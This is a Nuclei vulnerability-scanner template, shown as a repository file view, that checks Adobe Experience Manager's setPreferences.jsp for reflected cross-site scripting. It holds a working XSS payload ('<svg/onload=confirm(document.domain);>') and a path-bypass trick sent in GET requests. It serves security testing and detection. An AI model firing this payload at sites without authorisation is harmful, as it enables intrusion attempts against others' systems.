nuclei-templates/misconfiguration/aem/aem-setpreferences-xss.yaml

30 lines
905 B
YAML
Raw Normal View History

id: aem-setpreferences-xss
info:
name: AEM setPreferences XSS
author: zinminphy0,dhiyaneshDK
severity: medium
reference:
- https://www.youtube.com/watch?v=VwLSUHNhrOw&t=142s
- https://github.com/projectdiscovery/nuclei-templates/issues/3225
- https://twitter.com/zin_min_phyo/status/1465394815042916352
tags: aem,xss
requests:
- method: GET
path:
- "{{BaseURL}}/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"
- "{{BaseURL}}/content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=confirm(document.domain);>"
- 'A JSONObject text must begin with'
condition: and
- type: status
status:
- 400